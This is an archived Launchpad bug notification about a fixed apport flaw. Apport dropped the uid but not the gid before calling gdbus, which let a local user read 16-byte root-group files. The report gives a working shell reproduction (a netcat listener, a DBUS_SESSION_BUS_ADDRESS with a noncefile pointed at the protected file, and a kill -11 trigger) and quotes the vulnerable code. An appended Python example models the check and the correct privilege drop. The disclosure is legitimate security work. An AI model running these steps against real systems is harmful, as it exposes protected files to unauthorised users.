
group.of.nepali.translators team mailing list archive

[Bug 1885633] Re: [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability


** Also affects: apport
   Importance: Undecided
       Status: New

** Changed in: apport
       Status: New => Fix Released

** Changed in: apport
    Milestone: None => 2.21.0

** Changed in: apport
   Importance: Undecided => Medium

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1885633

Title:
  [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
  Vulnerability

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Bionic:
  Fix Released
Status in apport source package in Eoan:
  Won't Fix
Status in apport source package in Focal:
  Fix Released

Bug description:
  -- VULNERABILITY DETAILS ------------------------
  * Version tested: 18.04.4 LTS amd64 server
  * Installer file: ubuntu-18.04.4-live-server-amd64.iso
  * Platform tested: -

  ---

  ### Analysis

  Apport, the crash reporter in Ubuntu, executes gdbus to check whether the crashed pid belongs to a user session that is closing. Before executing the binary it drops privileges to the crashed process's uid, but it does not drop the group id, so the call can be used to leak a file owned by the root group.

  As a result, any user can read a file that is readable only by the root group, provided the file is exactly 16 bytes in size.

  Reproduction steps:
  ```
  ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
  ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
  ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
  ubuntu@ubuntu:/tmp$ su - zdi
  Password:
  zdi@ubuntu:~$ id
  uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
  zdi@ubuntu:~$ cd /tmp/
  zdi@ubuntu:/tmp$ ls -al securefile
  -r--r----- 1 root root 16 Jun 16 04:33 securefile
  zdi@ubuntu:/tmp$ cat securefile
  cat: securefile: Permission denied
  zdi@ubuntu:/tmp$ nc -lp 8888 &
  [1] 2034
  zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
  [2] 2036
  zdi@ubuntu:/tmp$ kill -11 2036
  zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH

  zdi@ubuntu:/tmp$
  ```
                                                                                                                                                               
  ~~~python
      # apport's gdbus call as shipped: only the effective uid is lowered
      orig_uid = os.geteuid()
      os.setresuid(-1, os.getuid(), -1)           # <-- did not set gid
      try:
          gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                                    'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
                                    'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
          (out, err) = gdbus.communicate()
          if err:
              error_log('gdbus call error: ' + err.decode('UTF-8'))
      except OSError as e:
          error_log('gdbus call failed, cannot determine running session: ' + str(e))
          return False
      finally:
          os.setresuid(-1, orig_uid, -1)
  ~~~
  -- CREDIT ---------------------------------------
  This vulnerability was discovered by:
  Ryota Shiga (@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative
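As an added example (not apport's, D-Bus's or the reporter's code), the Python below models why leaving the effective gid at 0 matters, using the uid/gid and file mode from the transcript above, and shows the complete drop sequence (supplementary groups, then gid, then uid); the function and constant names are assumptions.

```python
"""Added example, not apport's or D-Bus's own code. readable_by() models
the permission check the kernel makes when the spawned gdbus opens the
noncefile; helper_can_read_securefile() applies it to the credentials in
the report (uid/gid 1001, file -r--r----- root root); and
drop_to_crashed_process() is the drop sequence that closes the gap."""
import os
import stat

def readable_by(mode, owner_uid, owner_gid, euid, egid, groups):
    """POSIX read check: root reads anything; otherwise exactly one of the
    owner/group/other bit sets applies, chosen by which class matches."""
    if euid == 0:
        return True
    if euid == owner_uid:
        return bool(mode & stat.S_IRUSR)
    if owner_gid == egid or owner_gid in groups:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

# securefile from the report's transcript: -r--r----- root root, 16 bytes
# (the nonce-tcp transport reads a 16-byte nonce, hence the size limit).
SECUREFILE = dict(mode=0o440, owner_uid=0, owner_gid=0)
ZDI_UID, ZDI_GID = 1001, 1001

def helper_can_read_securefile(drop_gid):
    """Credentials gdbus inherits from apport. With the report's uid-only
    drop, egid stays 0 (root's group), so the group bits of a root:root
    file apply; with gid dropped too, only the 'other' bits apply."""
    egid = ZDI_GID if drop_gid else 0
    groups = [ZDI_GID] if drop_gid else [0]
    return readable_by(euid=ZDI_UID, egid=egid, groups=groups, **SECUREFILE)

def drop_to_crashed_process(uid, gid):
    """Groups and gid first, uid last: once euid is unprivileged, setgroups
    and setresgid are refused. setgroups needs CAP_SETGID, so it is only
    attempted while still root. Returns True when the drop is complete."""
    if os.geteuid() == 0:
        os.setgroups([gid])
    os.setresgid(-1, gid, -1)
    os.setresuid(-1, uid, -1)
    return os.geteuid() == uid and os.getegid() == gid

def real_ids():
    """The (uid, gid) a caller may drop to without any privilege."""
    return os.getuid(), os.getgid()

if __name__ == "__main__":
    print("leaks with uid-only drop:", helper_can_read_securefile(False))
    print("leaks with uid+gid drop:", helper_can_read_securefile(True))
```

A supplementary group of 0 would leak just the same, which is why the drop also resets the group list rather than only the effective gid.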
